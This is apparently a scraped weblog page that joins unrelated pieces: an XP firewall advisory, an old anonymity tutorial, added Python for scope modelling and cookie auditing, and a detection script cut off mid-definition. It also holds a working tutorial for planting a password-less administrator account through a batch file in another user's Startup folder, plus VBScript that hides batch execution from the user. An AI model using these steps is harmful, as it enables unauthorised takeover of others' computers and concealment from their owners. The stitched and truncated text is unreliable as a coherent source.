Weblog

Thursday, October 25, 2007

  • Microsoft Windows XP Firewall Default Configuration Vulnerability

    Summary
    After you set up Microsoft Windows Firewall in Microsoft Windows XP Service Pack 2 (SP2), you may discover that when you connect to the Internet over a dial-up connection, your computer can be accessed by anyone on the Internet. This is due to a bug in the way Windows Firewall handles local subnets.


    Details
    This problem occurs because of the way that Windows Firewall interprets local subnets when the "My network (subnet) only" option is used. Windows Firewall is included with Windows XP SP2.

    Because of the way that some dialing software configures routing tables, Windows Firewall in Windows XP SP2 can sometimes interpret the whole Internet to be a local subnet. This can let anyone on the Internet access the Windows Firewall exceptions. When the "My network (subnet) only" option is enabled, it is automatically selected for file and print sharing. Therefore, your shared drives can be unexpectedly revealed on the Internet when you use a dial-up connection.

    Solution
    To resolve this problem, download and install the Critical Update for Windows XP: KB886185.

    After you install the Critical Update for Windows XP (KB886185), Windows Firewall will no longer interpret a dial-up network connection to be on your local subnet.

    Specifically, any IP Route Table entry that has an IP address of 0.0.0.0 and has a mask of 0.0.0.0 will not be interpreted to be on the local subnet. This means that any port exceptions or program exceptions that use the "My network (subnet) only" option in Windows Firewall will not be available over a dial-up connection. You will still be able to access exceptions over a dial-up connection if you remove all scope restrictions, or if you create a custom scope for exceptions.

    Subnets can be highly variable, depending on the network that they are connected to. Therefore, using the "My network" scope restriction does not guarantee security. We strongly recommend that you use the custom scope option when you want to make sure that no unwanted incoming traffic is permitted to pass through your firewall exceptions.
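
The scope decision described above, as an added example that is not Microsoft's code: a small Python model of which source addresses a "My network (subnet) only" exception admits, before and after the fix. The two route tables are constructed in "route print" column order (destination, netmask, gateway, interface). The rule that a route counts as an on-link (local) route when its gateway equals its interface address is a modelling assumption, not something the article states; the fixed behaviour, that an entry with destination 0.0.0.0 and mask 0.0.0.0 is never treated as local, is what the article describes.

```python
"""Model of the "My network (subnet) only" scope check before and after
KB886185.  Added example, not Microsoft's code.  Route tables are
constructed; the "gateway == interface means on-link" rule is an assumption."""
import ipaddress

# Constructed: a typical Ethernet host behind a home router.
LAN_ROUTES = """
0.0.0.0        0.0.0.0          192.168.1.1   192.168.1.23
127.0.0.0      255.0.0.0        127.0.0.1     127.0.0.1
192.168.1.0    255.255.255.0    192.168.1.23  192.168.1.23
"""

# Constructed: a dial-up host whose dialer installed a default route with the
# PPP interface address itself as gateway (the pattern the article attributes
# to "some dialing software").
DIALUP_ROUTES = """
0.0.0.0        0.0.0.0          10.20.30.40   10.20.30.40
10.20.30.40    255.255.255.255  127.0.0.1     127.0.0.1
127.0.0.0      255.0.0.0        127.0.0.1     127.0.0.1
"""


def parse_routes(text):
    """Turn route-table text into (destination, mask, gateway, interface) tuples."""
    return [tuple(line.split()) for line in text.strip().splitlines()]


def local_subnets(routes, patched):
    """Networks the firewall treats as 'my network (subnet)'.

    patched=False reproduces the pre-KB886185 behaviour: every on-link
    route, including 0.0.0.0/0.0.0.0, is local.  patched=True applies the
    fix: the 0.0.0.0/0.0.0.0 entry is never local.
    """
    nets = []
    for dest, mask, gateway, iface in routes:
        if patched and dest == "0.0.0.0" and mask == "0.0.0.0":
            continue
        if gateway == iface:  # on-link route (modelling assumption)
            nets.append(ipaddress.ip_network(f"{dest}/{mask}", strict=False))
    return nets


def exception_allows(src, scope, routes, patched=True):
    """Does a firewall exception with the given scope admit traffic from src?

    scope is "any" (no restriction), "subnet" ("My network (subnet) only"),
    or a list of CIDR strings (a custom scope, the article's recommendation).
    """
    addr = ipaddress.ip_address(src)
    if scope == "any":
        return True
    if scope == "subnet":
        return any(addr in net for net in local_subnets(routes, patched))
    return any(addr in ipaddress.ip_network(cidr) for cidr in scope)


if __name__ == "__main__":
    dialup = parse_routes(DIALUP_ROUTES)
    remote = "203.0.113.9"  # arbitrary Internet address (TEST-NET-3)
    print("unpatched dial-up, subnet scope:",
          exception_allows(remote, "subnet", dialup, patched=False))
    print("patched dial-up, subnet scope:",
          exception_allows(remote, "subnet", dialup, patched=True))
    print("patched dial-up, custom scope:",
          exception_allows(remote, ["192.168.1.0/24"], dialup))
```

On the dial-up table the unpatched check admits the arbitrary Internet address through a subnet-scoped exception, which is the exposure the article describes; on the Ethernet table the default route is not on-link, so the same check already refuses it. The custom-scope branch is the option the article recommends when the exception must stay reachable over dial-up.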

    For more information about configuring Windows Firewall, visit the following Microsoft TechNet Web page: http://www.microsoft.com/technet/community/columns/cableguy/cg0204.mspx


    Additional information
    The information has been provided by Nathan Fowler. The original article can be found at: http://support.microsoft.com/kb/886185


    The Anonymity Tutorial / written by yours truly, Joseph (blacksun.box.sk)
    <=============================================================================> version 1.5, 22/3/00

    Note: whenever you see something like this: blah(1) it means that if you don't understand the meaning of the word blah there's an explanation for it just for you, located in the newbies corner in section 1.
    Note 2: if you're having a hard time reading this page because you have to scroll to the right whenever a long line comes, it's probably because you're not using "word wrapping".
    Most UNIX text editors and advanced Windows editors (and some less advanced ones like Wordpad) do this by themselves.
    To do word wrapping on Microsoft Notepad, simply go to Edit and then click on "Word wrapping".

    Author's notes
    ==============
    If you have any comments or questions regarding this tutorial (no flames(10) or spam, please) Email me at barakirs@netvision.net.il.
    Visit blacksun.box.sk for more tutorials, free hacking/programming/unix books to download and much more.

    Disclaimer
    ==========
    We do not encourage any kinds of illegal activities. If you believe that breaking the law is a good way to impress someone, please stop reading now and grow up. There is nothing impressive or cool in being a criminal.

    Contents
    ========
    Anonymity?
    * You mean I have absolutely zero anonymity on the web?
    * So what? Why would I wanna be anonymous anyway?
    * Okay, I see your point. Anonymize me.
    Proxies?
    * What are proxies?
    * What are public proxies?
    * Where can I find lists of public proxies?
    * Are they good for anything besides anonymity?
    * Okay, so how do I use them?
    Wingates?
    * What are Wingates?
    * How can I use them to anonymize myself?
    * Wingates sound useful. I wanna run one on my own computer. How do I do it without turning it into an "anonymity hive"?
    * How can I tell IRC clients, instant messengers such as ICQ, etc', to use them?
    Anonymous Remailers?
    * What is an anonymous remailer?
    * How can I use them to be more anonymous?
    * Why would a person start an anonymous remailing service? Where's the catch?
    Encryption?
    * Why should I encrypt my Email?
    * How can I encrypt my Email?
    Cookies?
    * What are cookies?
    * Can they risk my privacy?
    .chk files?
    * What are they?
    * How can they risk my privacy?
    The Anonymizer?
    * What is the anonymizer?
    * How can I sign up?
    Where can I learn more about anonymity?
    * Useful URLs.
    * Other useful tutorials by Black Sun.
    Appendix A: Using Altavista as a "proxy"
    * How can I use Altavista's web translation service to anonymize myself?
    Appendix B: Spoofing browser history
    * How can I spoof my browser's history?
    Appendix C: the +x mode
    Bibliography
    * http://www.theargon.com
    * Anonymizer.com
    * Various tutorials
    Other Tutorials By Black Sun
    * FTP Hacking.
    * Overclocking.
    * Ad and Spam Blocking.
    * Sendmail.
    * Phreaking.
    * Advanced Phreaking.
    * Phreaking II.
    * IRC Warfare.
    * Windows Registry.
    * Info Gathering.
    * Proxy/Wingate/SOCKS.
    * Offline Windows Security.
    * ICQ Security.

    Anonymity?
    ==========
    Whether you realize it or not, the Internet is not as anonymous as you might think. Here are a few examples:

    1) You enter a website. Once you hit any one of the files on the webserver, the website owners can find out these pieces of information about you, and much more:

    1. Your IP Address.
    2. Your hostname.
    3. Your continent.
    4. Your country.
    5. Your city.
    6. Your web browser.
    7. Your Operating System.
    8. Your screen resolution.
    9. Your screen colors.
    10. The previous URL you've been to.
    11. Your ISP.

    And this is just the tip of the iceberg. Go to our homepage at blacksun.box.sk and find the web statistics button (later addition: we have terminated our account on our webstats provider because they were quite buggy, and we've decided to use a php3-based text counter). There you will be able to see how much we can tell about our visitors.

    2) Another example: you're connected to an IRC network and you are chatting with your friends. Right now all a person needs in order to find information on you is your nickname. He doesn't even have to know you, or be in the same channel/channels you are. Here are a few examples of what you can find by simply knowing a person's nickname (in the most optimal conditions):

    1. Your real name.
    2. Your Email address.
    3. Your IP address.
    4. Your hostname.
    5. Your ISP.
    6. Your continent.
    7. Your country.
    8. Your city.

    And much much more.

    The same goes for online games that allow players to view the other players' IP addresses.

    3) Suppose my name is Paul Matthews, and my Email address is pmatthews@boring.ISP.net. It is extremely easy to figure out that the first letter of my first name is P and that my last name is Matthews, but that's not all.
    Some ISPs give their entire listings to web directories. Meaning, people can go to, say... whowhere.com, punch in the words Paul Matthews or search for people with Matthews as their last name on boring.ISP.net and find out that pmatthews@boring.ISP.net does actually belong to Paul Matthews, hence discovering your real name.
    But it is also possible to use these web directories for 1,001 uses. Therefore you should go to whowhere.com as soon as possible, try to track down yourself and then tell whowhere.com to delete your listing.

    4) Some ISPs also run finger daemons.
    A daemon is a program that waits for incoming connections on one or more specific ports.
    The finger daemon waits for connections on port 79. Once connected, you enter a username on the system the daemon runs on and get back plenty of information about that user.
    For example: a while ago my ISP was running a finger daemon on their servers (until I forced them to take it off because it was a privacy invasion). Now, suppose you know nothing about me besides my Email address, which is barakirs@netvision.net.il. The first thing you should do is to go to netvision.net.il on port 79 and hope there's somebody there. If there is, you can find the following information by typing in my username, barakirs:

    1. My real name.
    2. When was the last time I was online.
    3. If I'm online right now, since when have I been online.
    4. Whether I have new mail or not.

    And much much more (some finger daemons might give out other pieces of information, such as my home address and phone number).
    Besides the obvious uses (finding a person's real name and other private information), you can use this information for various purposes, such as:

    1. Most instant messengers, such as ICQ, AIM, YAHOO Instant Messenger and MSN Instant Messenger, allow you to add people in or outside your contact list to an "invisible list", so they won't be able to know whether you're online or not and you'll appear to be offline to them. If they have your Email address, and your ISP is running a finger daemon, they are able to know whether you're really offline or just trying to fool them.
    2. Your friend promised you to do something for you on the net, but when you finally go online to ask him if he's done it he says that he just got back from work and that he just got online. Using finger, you can test this and see when he really got online.

    These were just a few of many examples.
    During this tutorial I will explain to you how to prevent people from finding out information about you (there will always be new tricks, but blocking the most basic / common ones will hold off most attackers and make it harder for the more experienced ones). If you really wanna learn how to do these things, as well as some really cool and advanced tricks, then read the 'Info-Gathering' tutorial.

    Proxies?
    ========
    Proxies were first invented in order to speed up Internet connections. Here's how they work:
    You are trying to connect to a server on the other side of the planet. Your HTTP requests are sent to your proxy server, which is located at your ISP's headquarters, which are a lot closer to you than that far-away server. The proxy first checks if one of its users has accessed this website lately. If so, it should have a copy of it somewhere on its servers. Then the proxy server starts the connection only to check that its version is not outdated, which only requires it to look at the file size. If it has the latest version, it will send the file to you, instead of having the far server send it to you, thus speeding up the connection. If not, it will download the requested files by itself and then send them to you.
    But proxies can also be used to anonymize yourself while surfing the web, because they handle all the HTTP requests for you.
    Chances are that your ISP has a proxy. Call tech support and ask them about it. But the problems with proxy access given to you by your ISP are:
    1. Some ISPs don't even have proxies.
    2. The website owner would still be able to know what ISP you are using and where you live, since these proxies are not public and they can only be accessed by users of that ISP. For such cases, there is a solution - public proxies.
    You can find a list of public proxies everywhere. Here are two good URLs to start from:

    1. http://www.theargon.com
    2. http://www.cyberarmy.com/lists

    To configure your web browser to use a proxy server, find the appropriate dialog box in your settings dialog box (it varies between browsers).

    Note: some proxy servers will also handle FTP sessions (some might handle FTP only).

    Wingates?
    =========
    Wingate is a program that is used to turn a PC running Windows 9x or NT into a proxy server. Here are several reasons for why a person would want to run such an application and turn his computer into a proxy:

    1. If he owns an ISP and he wants to set up a proxy for it.
    2. If he wants to turn his computer into a public proxy.
    3. If he wants to give Internet access to a whole bunch of computers that are connected by a Local Area Network, but he can provide Internet access for only one computer. In that case, he would turn his computer into a proxy server and set all the other computers on the network to use him as a proxy. That way all the rest of the computers on the network will relay their HTTP and FTP requests through a single computer, a single modem and a single Internet account.

    The problem with Wingates is that they're highly... well... they're very... how should I say this? Stupid. Just plain stupid. Why is that?
    EVERYONE can connect to your little proxy by simply connecting to port 1080 on your computer and typing 'target-ip-address-or-hostname port' (no quotes) and replace target-ip-address-or-hostname with the IP address or the hostname they want to connect to, and replace port with the destination port. The "wingated" machine will then relay your input through it, but it will seem like the wingated machine is connecting to the target computer, not you.
    Sure, the sysadmin of the wingated machine can change that port to a different one, but this is the default, and if you're stupid enough to use Wingate you probably won't want to play with the defaults.
    First of all, if you need to use Wingate for some reason, use SyGate instead. It does exactly what Wingate does, only it won't serve EVERYONE like Wingate does.
    Now, these Wingates can be used to anonymize practically anything. Also, every program that can be set to run behind a SOCKS firewall (most IRC clients, most instant messangers and most web browsers) will automatically do the dirty work of routing your stuff through it if you'll give them the IP/hostname and the appropriate port for the wingated machine.
    Wingates can also be used to get into IRC channels you got banned from (by faking your IP).

    WARNING: some IRC networks run bots that will kick out people using Wingates. These bots try to connect to random people on port 1080. If they succeed, they kick you out. This works because the IRC network, as well as everyone on it, thinks that your IP is the wingated machine's IP. If the bot tries to connect to your IP on port 1080, it will actually go to the wingated machine. The bot will then detect that your IP is actually a wingate and kick you off (since it's being run by the IRC network and given enough privileges to kick out anyone).

    You can find lists of Wingates at http://www.cyberarmy.com/lists. There are also tons of Wingate scanners out there that can scan whole subnets and look for Wingates, but this might take some time (and make your ISP get suspicious), so you'd just better go for CyberArmy's lists.

    Anonymous Remailers?
    ====================
    Previously I have demonstrated to you what a person with very little knowledge can find out about you just by knowing your Email address. Now it is obvious that to keep your privacy, you need to sign up for a free Email account (such as Hotmail [hotmail.com], Yahoo mail [mail.yahoo.com], ZDNet Mail [zdnetmail.com], Net @ddress [netaddress.com], Bigfoot [bigfoot.com] etc'). But what if you had a special Email address on a free server that automatically forwards all incoming Email to your real mailbox and keeps all the information discreet?
    These are called Anonymous Remailers. Most of them are free and live out of contributions and/or sponsor banners they place on their website.
    You can find many many Anonymous Remailers at http://www.theargon.com.

    Here's a good example for an Anonymous Remailer:
    First, head to http://anon.isp.ee (by the way, the extension .ee stands for Estonia) and sign up your free account. Once you're a registered user, send an Email to robot@anon.isp.ee with no subject and the following content:
    user: your username
    pass: your password
    realaddr: your recipient's Email address.
    realsubj: the subject of your mail.
    Example: if I want to send an anonymous mail containing the following:

    Subject: ANONYMITY RULEZ!!
    Hi.
    This is an anonymous Email message.
    Let's see you trace me now!

    to bgates@microsoft.com, and your username is user and your pass is pass, send the following Email to robot@anon.isp.ee (remember not to enter a subject):

    user: user
    pass: pass
    realaddr: bgates@microsoft.com
    realsubj: ANONYMITY RULEZ!!
    Hi.
    This is an anonymous Email message.
    Let's see you trace me now!

    You'll receive an Email notification from anon.isp.ee once your message has been delivered.
    Once your recipient replies to this Email, the message will return to you.

    You can also use web-based anonymous remailers such as Replay Associates (replay.com/remailer/anon.html), but it won't let you receive replies.

    Encryption?
    ===========
    Everyone can read your Email. Whether it's some script kiddie who hacked your Hotmail account, a skilled cracker (or a script kiddie with a lot of free time) that hacked your POP3 mailbox or a person who got your Email by mistake. If you don't want other people to read your Email, use PGP.
    Everyone who uses PGP can have their own PGP key. A key consists of tons of characters, whether they are lowercase or uppercase letters, numbers or symbols. After you make your key, you need to transfer it to everyone you want to send encrypted mail to. Once they have it, you can start sending encrypted mail to them and they'll be able to use your key to decrypt it.
    More info on www.pgpi.com.

    Note: PGP is very strong and can only be broken with giant supercomputers. The longer your key is, the harder it is to break the encryption.

    Cookies?
    ========
    Have you noticed how all those websites on the net are getting "smarter" all of a sudden? You know, like the way message boards remember your nickname, some sites remember your password so you won't have to retype it every time, electronic malls remember what you last put in your virtual shopping cart etc'.
    This is all because of cookies. Cookies are small files which a website can request your browser to create and then retrieve information from them. Websites can put your password or any other information in these files.
    If you don't want your co-workers or other people to sniff around and see where you've been visiting, what items you've been buying etc', you should delete them when you don't need them.
    On Unix, your cookies would usually be stored somewhere in your home directory (usually /home/your-login, /usr/your-login or /usr/local/your-login if you're a regular user and /root if you're root, but anyone with write access to /etc/passwd can change that).
    On Windows and Mac, cookies are stored on a sub-directory at your browser's directory called cookies.

    Note 1: you can tell your browser to ask you before accepting a cookie. Just play around with its preferences menu, you'll find it (there are so many browsers out there so I can't give a detailed explanation for every single one).
    Note 2: if you're browsing from a public computer, do not save any cookies, or other people will be able to snoop around and look at your cookies or even enter various websites with your passwords, your credit card number etc'.

    A reader called Stone Cold Lyin Skunk has pointed out to me that the cookies.txt file may be found in the netscape\users\default directory. This happens when you register your user (Netscape lets you have multiple users for the same program, each user with his own settings etc') without giving it a username.
    He also pointed out to me that some websites will require you to accept cookies in order to enter them.
    Also, he recommended to beware of your browser's history file (information on removing it can be found on the "Where Can I Learn More About Anonymity?" chapter), as well as your cache and your preferences.js files, because they may reveal your browsing habits (where have you been, etc').
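
A way to act on the advice above about cookie files, as an added example that is not part of the tutorial: a Python audit of a Netscape-format cookies.txt (the format mentioned above; each line holds seven tab-separated fields: domain, include-subdomains flag, path, secure flag, expiry as Unix seconds with 0 for a session cookie, name, value). It sorts cookies by what would still be readable on disk after the browser is closed, and writes back only the ones you choose to keep. The sample file and the domain names are constructed.

```python
"""Audit a Netscape-format cookies.txt file.  Added example, not part of the
tutorial; the file contents are constructed (hosts use the reserved .test TLD)."""
import time

# Constructed cookies.txt.  Fields (tab-separated): domain, include-subdomains
# flag, path, secure flag, expiry (Unix seconds, 0 = session cookie), name, value.
SAMPLE_COOKIES_TXT = """\
# Netscape HTTP Cookie File
# This is a generated file!  Do not edit.

.example-shop.test\tTRUE\t/\tFALSE\t4102444800\tcart\titem42
.example-shop.test\tTRUE\t/\tTRUE\t4102444800\tsession_token\tdeadbeef
forum.example.test\tFALSE\t/\tFALSE\t0\tnick\tpmatthews
bank.example.test\tFALSE\t/login\tFALSE\t946684800\tremember\tyes
"""


def parse_cookies_txt(text):
    """Parse cookies.txt lines into dicts; comment and blank lines are skipped."""
    cookies = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, found {len(fields)}")
        domain, subdomains, path, secure, expires, name, value = fields
        cookies.append({
            "domain": domain,
            "include_subdomains": subdomains == "TRUE",
            "path": path,
            "secure": secure == "TRUE",
            "expires": int(expires),
            "name": name,
            "value": value,
        })
    return cookies


def audit_cookies(cookies, now=None):
    """Group cookies by what they reveal once the browser is closed."""
    now = time.time() if now is None else now
    report = {
        "domains": sorted({c["domain"].lstrip(".") for c in cookies}),
        "session": [],              # vanish when the browser exits
        "expired": [],              # dead weight, but still readable on disk
        "persistent_secure": [],    # survive; only ever sent over HTTPS
        "persistent_insecure": [],  # survive; sent in clear text
    }
    for c in cookies:
        label = f"{c['name']}@{c['domain']}"
        if c["expires"] == 0:
            report["session"].append(label)
        elif c["expires"] <= now:
            report["expired"].append(label)
        elif c["secure"]:
            report["persistent_secure"].append(label)
        else:
            report["persistent_insecure"].append(label)
    return report


def prune_cookies(cookies, keep_domains=(), now=None):
    """Keep session cookies, plus unexpired cookies for allow-listed domains only."""
    now = time.time() if now is None else now
    kept = []
    for c in cookies:
        expired = c["expires"] != 0 and c["expires"] <= now
        allowed = c["domain"].lstrip(".") in keep_domains
        if not expired and (c["expires"] == 0 or allowed):
            kept.append(c)
    return kept


def format_cookies_txt(cookies):
    """Serialise cookies back into the cookies.txt line format."""
    lines = ["# Netscape HTTP Cookie File"]
    for c in cookies:
        lines.append("\t".join([
            c["domain"],
            "TRUE" if c["include_subdomains"] else "FALSE",
            c["path"],
            "TRUE" if c["secure"] else "FALSE",
            str(c["expires"]),
            c["name"],
            c["value"],
        ]))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    jar = parse_cookies_txt(SAMPLE_COOKIES_TXT)
    for key, items in audit_cookies(jar).items():
        print(f"{key}: {items}")
    print(format_cookies_txt(prune_cookies(jar, keep_domains={"forum.example.test"})))
```

The "domains" list alone is the browsing history the tutorial warns about: it survives even when every value in the file is meaningless. Expired cookies are no longer sent to anyone but still sit in the file until the browser rewrites it, so the prune step drops them too.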

    .chk files?
    ===========
    Stone Cold Lyin Skunk has pointed out that if you're running Windows and you do a quick reboot (hold down shift while telling Windows to reset) Windows generates a file called FILE0001.chk, FILE0002.chk etc' (usually found on c:\). You will be amazed to see how much information you could find in these files! Delete them ASAP!

    The Anonymizer?
    ===============
    The Anonymizer is an Internet service that helps you anonymize yourself better. The Anonymizer's homepage is www.anonymizer.com. Here's a snapshot from anonymizer.com:

    +++++

    Company Overview
    ----------------
    Anonymizer.com is a pioneer in Internet privacy technologies, and the most popular and trusted name in delivering online privacy services. Anonymizer.com, today, has many thousand subscribers to its paid services and makes anonymous over 7.5 million pages a month. Lance Cottrell, founder and President of Anonymizer.com, authored the world's most secure anonymous remailer, Mixmaster and has been active for many years in promoting free speech. Lance received his undergraduate degree in physics from The University of California, Santa Cruz and a masters in Physics from The University of California, San Diego.
    Justin Boyan, while a Computer Science Ph.D. student at Carnegie Mellon University, designed and implemented Anonymizer surfing. Anonymizer Surfing is now in its 4th generation under development by the Anonymizer engineering team.

    Our Mission
    -----------
    Our mission is to ensure that an individual's right to privacy is not compromised once they are online. We began this company as a means to protect this right as embodied in the United Nations' Universal Declaration of Human Rights:
    "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honour and reputation. Everyone has the right to the protection of the law against such interference or attacks."

    While written 50 years ago, article 19 of this document is now more than ever applicable with the advent of the recent growth of the Internet:
    "Everyone has the right to freedom of opinion and expression; this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers."

    You can read the full Universal Declaration of Human Rights on the following URL: http://www.unhchr.ch/udhr/lang/eng.htm.

    +++++

    You can use The Anonymizer to surf the web with anonymity for free by going to anonymizer.com and typing in the target URL where asked, or buy an Anonymizer package, which will give you more benefits. If you want some of the money you pay to go to Black Sun, subscribe through the following URL: http://www.anonymizer.com/3.0/affiliate/door.cgi?CMid=12437.
    If you want, you too can join their affiliate program. Simply go to http://www.anonymizer.com/3.0/affiliate/afdoor.cgi?CMid=12437 for more information. If you subscribe through this URL, you will still receive all the cash you deserve, but we at Black Sun will also receive some benefits.

    Where Can I Learn More About Anonymity?
    =======================================
    Useful URLs: http://www.theargon.com.
                 http://www.pgpi.com (for learning about PGP encryption and how to use it to encrypt your Emails)
                 IP Spoofing Demystified - a long article from Phrack magazine on IP spoofing (faking your IP). You can download it from our books section.
                 http://www.cyberarmy.com/lists - for lists of Wingates, Proxies and free shell accounts you can surf from to anonymize yourself.
                 http://2waymedia.hypermart.net/hh/browsers/index.htm - how to completely clear your browser's history

    Other useful Tutorials by Black Sun: IRC Warfare by The Cyber God (for learning more on Anonymizing yourself on IRC), Proxy/WinGate/SOCKS tutorial by Jatt and Sendmail by me, R a v e N.

    Appendix A: Using Altavista as a proxy
    ======================================
    If you go to altavista.com, and under their tools section choose translation (or go directly to the following URL: http://babelfish.altavista.com/cgi-bin/translate?), you can ask Altavista to translate web pages for you.
    But you can also use this as a proxy, since when you tell Altavista to translate a web page, Altavista's CGI translation script retrieves the page for you.

    Thanks to Yoink for this information.

    Appendix B: Spoofing browser history
    ====================================
    Here is something I got by Email from a reader called Stone Cold Lyin Skunk:


    set up a V3 redirect (http://www.v3.com or something like that)
    then build a quick webpage with a link to the site you want to
       view discretely
    then go to your webpage via the V3 redirect

    all I know is that the URL indicator at the top of the browser
    will not show the URL you visit even your own .index page
    it will only show the URL name

    so if there is URL logging at your job or school or whatever,
    they can always surf to your homepage via the V3, which they will
    have. But, by then, you will have erased or. Or maybe it has
    "hidden" links (links the same color as the background)...

    in any case, they will not have your URLs and they certainly
    won't have proof you surfed there...

    for instance, you may not want, say, your local library sysop to
    know about Black Sun...so you set up say, a Homestead homepage (these are
    great because they feature password protected pages) ...you then
    set up a V3 redirect to that page. Bingo- you can now surf to the
    page via V3, log in with your password, hit all those cool hidden
    links to Black Sun, CyberArmy, peacefire.org what whatever, and the
    URL snoop software will only record the original http://surf.to/fakeoutname
    ... and don't forget, make the V3 URL as
    innocuous-sounding as possible...eg. http://surf.to.backetweaving ...

    Appendix C: the +x mode
    -----------------------
    In IRC, it is possible to put yourself into mode x by typing '/mode yournick +x' (do not include the quotes and replace yournick with your own nick. For example: /mode raven +x).
    This tells the IRC server to hide your IP, so when others try to /whois you or /dns you, they won't be able to get your IP (they will get a partial IP instead).
    This will only work on some servers, but when you're on IRC, it is recommended to use this option.
    Also, there is a way to bypass this. By simply creating a DCC connection with someone else (either a DCC chat or a DCC file transfer), you could then type 'netstat' (without the quotes) on either Unix or Windows/DOS and see what connections your computer is currently handling. One of them will be the DCC connection to that other guy.
    Why is that? Because DCC stands for Direct Client Communication, which means that DCC actions are not done through the server, but directly (think - why would the owners of the IRC server want people to transfer files through their servers and initiate private chats through their servers? It'll just chew up some bandwidth). The netstat command shows all current connections (local or remote), and one of them will be your DCC connection with that other guy. You will then be able to see his/her IP or hostname.
    Note: on some networks this is done by typing /mode yournick +z

    Appendix D: Anonymity on Usenet
    -------------------------------
    Do you post on Usenet regularly? Are you concerned about your anonymity?
    Then you should go to www.deja.com and sign up for a free account which will let you post anonymously.
    Nothing will be revealed about you, not even your IP, since deja.com handles the actual posting.

    Bibliography
    ============
    1) The Argon - http://www.theargon.com
    2) The Anonymizer - http://www.anonymizer.com
    3) Various tutorials spread across the net.


    Getting Administrator Access on a Computer- using a simple batch file

    This is a 3 part Tutorial for Creating your own Administrator account
    on a computer using a batch file.

    // when you see "//" it means I am typing a comment

    //This will not work on all computers, and requires administrator
    access to run the batch properly

    -----------------------------------------------------------------------------------------
    Part A

    1. Open Notepad

    2. paste the following into notepad (no quotes)
    @echo off
    net user Admin /add /expires:never /passwordreq:no
    net localgroup "Administrators" /add Admin

    3. Save the file as whatever.bat

    // it can have whatever filename you want
    // but must contain the .bat file extension

    4. Save the batch file to a floppy disk

    ------------------------------------------------------------------------------------------
    Part B

    // This is for if you have administrator access to the computer

    1. Just run the batch file by double clicking

    ------------------------------------------------------------------------------------------

    Part C

    // This is for if you do not have access to administrator


    1. put floppy in computer

    2. Right click on the batch file click copy

    3. go to C:\Documents and Settings\

    // now you should see some folders with users names
    // look for an admin folder or an all users folder

    4. open the folder, should be something like C:\Documents and Settings\All Users\

    // look for a startup menu folder

    5. open the folder, should be something like this C:\Documents and Settings\All Users\Start Menu\

    // now look for either program files, programs, or startup

    6. open the folder, should be something like this D:\Documents and Settings\All Users\Start Menu\Programs\, or D:\Documents and Settings\All Users\Start Menu\Programs\Startup

    // if it's like the second choice skip to step 8
    // now look for a start menu folder

    7. open the folder, should look like this D:\Documents and Settings\All Users\Start Menu\Programs\Startup

    8. Now Paste the Batch file into the Start Menu

    // Done! Now wait about a week (or however long you think it will take
    for the admin to log on) and come back, then try logging in as the new admin
    account. If it works, great, you have yourself an admin account on that
    computer


    Subject:  Stealth execution of a batch file
    ==============================================

    Batch files are great. Easy to make and execute, they are (in my
    opinion) one of the best ways to manipulate a system. The problem
    with batch files is that they open up the "DOS window" to execute,
    alerting the user that code has been executed. Sometimes that works
    against you, as a cornerstone of hacking (in my opinion) is stealth.
    By not allowing the target to know that they are a target, you give
    yourself more time, access, and less chance of being either detected
    or stopped.

    So... there is a way to run batch files WITHOUT a dos window. We'll
    use Tom, Dick, and Jane as examples.

    You'll need 3 files.
    Dick.BAT
    Jane.VBS
    Tom.BAT

In Dick.bat (this runs your batch file 'silently') type:
    wscript.exe "C:\pick a dir\Jane.vbs" "Tom.bat"

    In Jane.vbs type in:
    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

    Name the .bat you want executed "silently" Tom.bat

    There you have it. Simply, Jane makes Tom run silent, while Dick
    executes Jane. Run Tom, run!
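From the defender's side, both of the tricks above (Part C's batch file dropped into the All Users Startup folder, and the Dick/Jane/Tom chain where wscript.exe launches a batch file with no console window) leave a recognisable trace in process-creation telemetry. The following Python is an added example, not code from either tutorial; it assumes Sysmon-style ParentImage/Image/CommandLine fields, and the sample events are constructed.

```python
import ntpath
import re

# Constructed sample process-creation events (assumed Sysmon-style field
# names; none of these come from real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\WINDOWS\explorer.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\task.bat"'},
    {"ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "Image": r"C:\WINDOWS\system32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\pick a dir\Jane.vbs" "Tom.bat"'},
    {"ParentImage": r"C:\WINDOWS\system32\wscript.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r'"C:\WINDOWS\system32\cmd.exe" /c ""Tom.bat" "'},
    {"ParentImage": r"C:\WINDOWS\explorer.exe",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe"'},
]

STARTUP_DIR_RE = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
BATCH_RE = re.compile(r"\.(bat|cmd)\b", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def basename(image):
    """Lower-cased file name of an image path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(image).lower()


def startup_batch_launch(ev):
    """cmd.exe running a .bat/.cmd that lives in a Startup folder (Part C)."""
    return (basename(ev["Image"]) == "cmd.exe"
            and BATCH_RE.search(ev["CommandLine"]) is not None
            and STARTUP_DIR_RE.search(ev["CommandLine"]) is not None)


def script_host_with_batch_arg(ev):
    """wscript/cscript started with a .vbs and a batch file argument (the Dick.bat stage)."""
    return (basename(ev["Image"]) in SCRIPT_HOSTS
            and ".vbs" in ev["CommandLine"].lower()
            and BATCH_RE.search(ev["CommandLine"]) is not None)


def wscript_hidden_batch(ev):
    """cmd.exe whose parent is a script host and whose command line names a batch file (Tom.bat run by Jane.vbs)."""
    return (basename(ev["Image"]) == "cmd.exe"
            and basename(ev["ParentImage"]) in SCRIPT_HOSTS
            and BATCH_RE.search(ev["CommandLine"]) is not None)


RULES = {
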